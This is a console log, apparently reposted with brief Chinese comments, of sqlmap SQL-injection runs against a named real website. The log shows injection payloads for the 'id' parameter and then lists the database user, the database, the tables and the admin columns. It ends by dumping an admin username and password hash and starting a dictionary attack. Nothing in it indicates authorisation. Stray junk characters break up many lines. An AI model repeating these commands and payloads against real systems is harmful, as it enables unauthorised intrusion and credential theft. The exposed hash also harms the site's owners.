D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 g3 P. `- t/ K$ {; ], q5 u4 L
ms "Mysql" --current-user /* 注解:获取当前用户名称
8 K e/ L6 @% P. ` sqlmap/0.9 - automatic SQL injection and database takeover tool
2 v g; L/ e, d& w* o http://sqlmap.sourceforge.net starting at: 16:53:54
. J, [" h2 q) N[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
' K2 e( U# n$ h! w session file
* A1 s! E0 z @% O% S[16:53:54] [INFO] resuming injection data from session file/ D% `& Z/ d- v. X5 H! w1 W
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
- \8 G S' q$ F* K$ H. o2 a[16:53:54] [INFO] testing connection to the target url5 q% |3 D1 o" M: n* F2 \% _2 Q
sqlmap identified the following injection points with a total of 0 HTTP(s) reque( D: o+ M9 N# n8 W3 M( |$ v5 [
sts:; M5 }! ` ?9 r) P K
---1 Y6 g4 T8 c% q K' d
Place: GET3 G e( ]% E9 Q- ^" p4 D- d9 D
Parameter: id. U# ^$ D6 M$ Z! L
Type: boolean-based blind8 C @8 M6 k3 h; D
Title: AND boolean-based blind - WHERE or HAVING clause" C: `/ F+ G! V
Payload: id=276 AND 799=799
. A& |. E V0 m9 D8 L Type: error-based
2 ]; x7 N( N7 p. ^/ k, u$ i4 J2 f Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
0 B7 h* c3 ]7 o Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 j% H: \; |* P* Y( M2 B120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
3 A) G& c/ y7 V' \/ c8 N),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
6 @5 v \. ~" U- \8 G, A Type: UNION query+ P7 w' O- h* ~: }0 V6 j6 U
Title: MySQL UNION query (NULL) - 1 to 10 columns
7 a3 r) S) R$ t0 a l& @ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR3 Q" V2 E+ w* B! [
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 i% q- L% Q4 u+ m: b
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# n6 N2 \4 l( Q' H
Type: AND/OR time-based blind
5 M( N1 \. D* N1 B Title: MySQL > 5.0.11 AND time-based blind
' p/ g0 S$ V( R8 A e" Q Payload: id=276 AND SLEEP(5)& G; }. a3 v9 G( `: |' O# c7 G% P
---
9 ^4 O5 J$ Q& U- ][16:53:55] [INFO] the back-end DBMS is MySQL
# Q% k# H8 L8 ^; U6 Lweb server operating system: Windows9 o, ]1 |6 c7 m
web application technology: Apache 2.2.11, PHP 5.3.00 V& q a+ ]$ ^) F; P8 ]" ^
back-end DBMS: MySQL 5.0
8 _; s7 X } ^2 N[16:53:55] [INFO] fetching current user
" m: O: Q: O- u" `) ucurrent user: 'root@localhost'
. b7 x3 o% e) h5 C3 t7 \/ l[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
% u. S8 {6 l9 X. R5 `tput\www.wepost.com.hk' shutting down at: 16:53:586 d) W0 D; f8 U! ?
* u0 x* C! d% V& S oD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
" u) P. H9 B' {( {. j) M4 k; nms "Mysql" --current-db /*当前数据库& ^$ e2 g' ^2 M
sqlmap/0.9 - automatic SQL injection and database takeover tool/ Z( t, R6 t u F
http://sqlmap.sourceforge.net starting at: 16:54:16
( e5 S+ G0 J8 p[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
! ~! {" J' @: ]+ f* u. t/ i session file
# e6 Y/ c2 { i7 L[16:54:16] [INFO] resuming injection data from session file
* p5 z; f7 w4 u' i' G R[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file: I& K E3 C8 I3 g
[16:54:16] [INFO] testing connection to the target url; u* Q) Z. L8 ]0 r, E
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
8 }" z8 X4 h, m4 l! ?$ G$ l4 u6 hsts:
& g" Y0 `1 V% |+ n---
; c8 w# D Z; I5 ?% x2 ^& vPlace: GET m* [3 k6 k! I0 ^
Parameter: id
/ B' v# U/ w# w8 h Type: boolean-based blind
+ S. i; O4 M) `/ H! h1 P I; a9 Z Title: AND boolean-based blind - WHERE or HAVING clause
- U" {* u3 i; t# @3 }) C+ K- n Payload: id=276 AND 799=799- {3 J3 S: E2 v& C- o8 Y$ Z" L6 U
Type: error-based$ q2 L9 F$ x( Y8 @7 `" e4 {
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
9 {3 W% a+ U9 ? Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; n, P' {0 o, ~
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
3 X* H5 B* H8 ?. w$ A: K6 X0 u. T),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 n* z) [* s6 x9 x- x3 a5 N/ [
Type: UNION query5 N+ p- M; u5 N7 [7 a
Title: MySQL UNION query (NULL) - 1 to 10 columns6 ~, O" Z( K' _% O) Q, [
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! L) ~: ~. \% H ?) ?. w9 G" H(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 s- j/ [* g2 t/ t, t" o- s
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
$ Y% j+ C6 s% O$ L' ]7 @ Type: AND/OR time-based blind
) d' k$ D$ W: ^0 s$ m' e! @8 y Title: MySQL > 5.0.11 AND time-based blind
+ C, }2 w2 n0 b3 p( s Payload: id=276 AND SLEEP(5)7 P! @: S& Y8 P' p* n4 z
---
' q/ l9 M& N' Z/ d" C Z) p& b( }) i[16:54:17] [INFO] the back-end DBMS is MySQL
* p! t+ W: L/ o6 [# Z) pweb server operating system: Windows
- S& N: i/ O& b( ~web application technology: Apache 2.2.11, PHP 5.3.0) k2 m. o# q; n7 i
back-end DBMS: MySQL 5.04 N( _, p" D( W
[16:54:17] [INFO] fetching current database9 [8 V" [/ Y3 f2 q
current database: 'wepost'3 y5 R# {/ [# p+ t6 b7 ?
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
2 y0 x+ |( \3 ~, } \3 btput\www.wepost.com.hk' shutting down at: 16:54:18/ Q/ Z8 h8 m8 {0 U
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
4 e5 B$ R0 A; I$ oms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
- L1 m s& |" s sqlmap/0.9 - automatic SQL injection and database takeover tool$ ~( O4 S$ w5 F: J
http://sqlmap.sourceforge.net starting at: 16:55:25- E: w; ?1 v }0 O! p9 e
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 |) ~0 D9 G& e f* F$ `$ r
session file
2 U! s, Y% y: j4 `& w0 _0 G[16:55:25] [INFO] resuming injection data from session file
# U% o6 T" @0 ^( S# l* g9 m[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file5 f- }' L5 X5 e- K8 Y8 |& b- f
[16:55:25] [INFO] testing connection to the target url
h3 k/ b* T3 E3 b) J- n$ usqlmap identified the following injection points with a total of 0 HTTP(s) reque
8 }# F% E4 s7 i' t. H, N3 p$ h1 asts:
' b3 o# T* f/ ]. I6 a2 d# x---8 R9 C: q( u' H
Place: GET
& B% r) Y7 h6 X7 v* r# m2 `Parameter: id
3 M5 w, E1 m" f Type: boolean-based blind6 O! T7 P8 C7 P. g9 w3 r& X' j
Title: AND boolean-based blind - WHERE or HAVING clause
: v/ @, i; s$ V3 K/ \0 x Payload: id=276 AND 799=799- C a3 S# p/ V
Type: error-based
. N+ n; y' b: ^- s5 P' e/ V Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause7 i! r' I, V# Z* F& X
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
, F8 R$ M' z& T& r2 j) x120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
% h6 n& ?# l( v' j),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
0 L) f7 F6 C6 F/ R Type: UNION query
5 G8 w; d9 x. p7 O Title: MySQL UNION query (NULL) - 1 to 10 columns9 m1 ?# ~0 Z: j: `
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
2 c8 t$ @9 i/ a) y( L2 ^( T(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! Q4 X! V8 L7 K1 Z1 O5 H
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
1 S9 g9 E3 H- b Type: AND/OR time-based blind
+ W" K' v- d) ?0 f2 n Title: MySQL > 5.0.11 AND time-based blind
! B/ J0 h0 u- R/ l4 j" `. s Payload: id=276 AND SLEEP(5)
* J' T4 ~. P# E* p! K---1 Y6 j% K0 U, N$ X" c
[16:55:26] [INFO] the back-end DBMS is MySQL, Y& n& Z( q: _$ g9 N
web server operating system: Windows
" C- C8 X5 }# u- Jweb application technology: Apache 2.2.11, PHP 5.3.0% u( Q/ Q! f; M
back-end DBMS: MySQL 5.0) W, V; R) r, F9 f; b1 G* R3 G
[16:55:26] [INFO] fetching tables for database 'wepost'9 h1 \4 [: Y2 B* g& ^: R( Z
[16:55:27] [INFO] the SQL query used returns 6 entries1 @0 i$ y; h; Y
Database: wepost( ?; ]6 q# L4 P( t9 m7 [
[6 tables]! H, ^5 N9 n8 ?* `
+-------------+
9 \5 N, n0 s# n3 W| admin |
+ h7 a, F9 V$ w- ^; ?| article |3 Q: u4 X$ A3 V- ~
| contributor |! U; Z! h' G ]4 n
| idea |
; n2 e$ l ?; ~2 X, s! J& F _| image |' q: o8 G) H, V* k4 ?8 n$ q- ?% {
| issue |
& M: x5 ]! N2 {+ A3 u5 ~' q3 _+-------------+
0 }) M& S M1 [! F[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
M; r$ u6 X5 ~% }tput\www.wepost.com.hk' shutting down at: 16:55:33
0 u9 X9 o+ l2 S! c7 v. i
! C1 z2 D6 m H% X' C. w% _D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: g7 [: r! Q0 n! Jms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
B: F5 H+ v8 q0 i* n sqlmap/0.9 - automatic SQL injection and database takeover tool; z9 \6 [4 L" ~+ {3 y
http://sqlmap.sourceforge.net starting at: 16:56:06) q0 P, G8 x% g8 I" ^: o, ~- ?/ e, m
sqlmap identified the following injection points with a total of 0 HTTP(s) reque1 B: f" g- j0 A3 r! ~$ E. o. ?$ y
sts:8 u: g6 l0 k9 J9 b- x L1 T) J
---% s5 c0 V* b' m. U {
Place: GET
1 n1 h' o! i, k8 }1 K0 Q% ]. yParameter: id- W1 F0 E, v7 X3 S5 p6 y4 |2 Z
Type: boolean-based blind5 h. Q* U+ L+ h' p
Title: AND boolean-based blind - WHERE or HAVING clause
* n& T0 @0 v2 v, H# t Payload: id=276 AND 799=799/ a# w3 U3 s% e( F. I3 X$ t7 `# ?
Type: error-based
1 U, \3 C- M9 a7 z: P& d* |- f1 M Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
1 Y- b! ^: i/ I; I! e# V# r$ y Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,9 z' r0 F6 x: F5 N
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( w+ ]6 N' A& K ~1 d
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
! T! c: E9 H* }( c3 [0 i8 s Type: UNION query
2 Y D' T1 x! Q0 ? Title: MySQL UNION query (NULL) - 1 to 10 columns
: ~8 `4 n; D( Q6 Y0 f" o9 i& x Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ H5 C' C! j$ ?: `$ l Y8 |
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),/ T0 [, V* c+ F
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
0 e) U Q5 k: q2 n4 X8 \ Type: AND/OR time-based blind! m) W" b, q& i/ @/ v7 B' @3 P w
Title: MySQL > 5.0.11 AND time-based blind
7 v/ U8 y- M) z. D Payload: id=276 AND SLEEP(5)5 e; ^: \6 A( W# B
---- V- A6 E' ?; C
web server operating system: Windows
; y; L, u* d+ {3 A7 Gweb application technology: Apache 2.2.11, PHP 5.3.0
/ c9 d' l& `$ n2 [- E# ]back-end DBMS: MySQL 5.0
- X0 Y* A- S7 ]% g" u[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
, m$ `/ ]9 }5 J+ L% E' ?ssion': wepost, wepost* M9 |8 P9 K8 I8 R
Database: wepost7 ^0 Q/ N! U2 [
Table: admin
1 p3 ~$ x; E9 y' G& \[4 columns]
/ V! k: a0 Y" L) ^& E9 S5 w+----------+-------------+
' v1 B: M; ~1 o1 f/ t, }5 s| Column | Type |5 q3 [7 }% ~; z4 R$ ^& p
+----------+-------------+
. V" O, N+ I9 t/ }3 Q, z! R| id | int(11) |
7 a% y* ^- V; _, y* ^| password | varchar(32) |" g! u; u) E0 J, u5 J4 P8 T
| type | varchar(10) |
% R' N0 I$ _% c* q3 a| userid | varchar(20) |; \# c9 y: p5 W- Q! S& ~' ~9 v
+----------+-------------+; ~; V( ~( g* U
shutting down at: 16:56:19" S7 d% s. e1 ^5 _& X
+ L, n& ~2 M' l w5 [
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
! w0 a p, g' W9 t& g3 K" Cms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容) L- y2 [4 z5 F+ ]3 f% M0 B- }
sqlmap/0.9 - automatic SQL injection and database takeover tool* R' e& O) W- d$ {* z0 Q
http://sqlmap.sourceforge.net starting at: 16:57:14& V# H8 U3 H, o2 q/ X
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
/ T6 _, W b/ W/ K3 t! H9 n' ^. g9 hsts:' V! E+ D4 `0 b9 G
---
% p5 k5 X0 r5 k# {& ?3 x/ ZPlace: GET
2 v( J5 J2 S6 {6 w: o$ q f) a% PParameter: id
w7 G7 I4 \4 ^, e. t Type: boolean-based blind
9 v q, @' `2 J$ f Title: AND boolean-based blind - WHERE or HAVING clause. g9 p& \& y$ L+ o0 N
Payload: id=276 AND 799=799
* J* C7 G! K* m( @8 Y5 k6 ~( T Type: error-based0 v- N: ?* J, Q# k/ c g
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause$ p4 j' f( w) y% a" F
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
9 n3 ?* }: t4 l7 y! g- y120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
! d. k( d4 w, l),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
& c# m. w4 w. w# b! o; k Type: UNION query) X: P, P; u+ V
Title: MySQL UNION query (NULL) - 1 to 10 columns
' w% R( n' ^; D, |6 G" T. X* N$ j Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! c8 ]- p# Y: y0 J(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! E' N& p/ n) f3 W2 o9 [
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#$ i& X- D! C# ]: x6 _2 G5 |2 S# {
Type: AND/OR time-based blind9 u0 L( a) z& D3 A! g+ O
Title: MySQL > 5.0.11 AND time-based blind
3 G5 e. ]/ o8 ] Y+ f Payload: id=276 AND SLEEP(5)/ Z1 [4 n2 d0 H* O( u
---
6 N8 H/ E: S- D3 I9 f. ^web server operating system: Windows
7 o6 M% z7 e. N/ z( i8 G# c% {3 Pweb application technology: Apache 2.2.11, PHP 5.3.0% x; \) F( x5 a
back-end DBMS: MySQL 5.0
9 r( p& J' o! u9 erecognized possible password hash values. do you want to use dictionary attack o
8 ?* l. K; [2 j. un retrieved table items? [Y/n/q] y0 T P# b7 ?/ f
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
j' z5 C6 c3 t% qdo you want to use common password suffixes? (slow!) [y/N] y
2 n1 L7 t- a6 V) mDatabase: wepost1 ~0 P7 @# S$ T( L( @9 t8 h( S
Table: admin
9 G8 n8 v0 N" Y) v& T[1 entry]
8 o8 K R+ }% l# O2 ]4 i- Q2 T+----------------------------------+------------+1 r5 \/ e+ _; t
| password | userid |0 ^! l6 y9 U% a; z
+----------------------------------+------------+0 c9 X; k& t6 s( M. Q3 d- m
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |& j' l9 _: E. \4 H1 @4 Z
+----------------------------------+------------+; z1 i/ G+ b2 m9 Q, X+ U1 D x
shutting down at: 16:58:14
, x) A, @1 J' r
& A# u8 G: I! t! R: N. HD:\Python27\sqlmap> |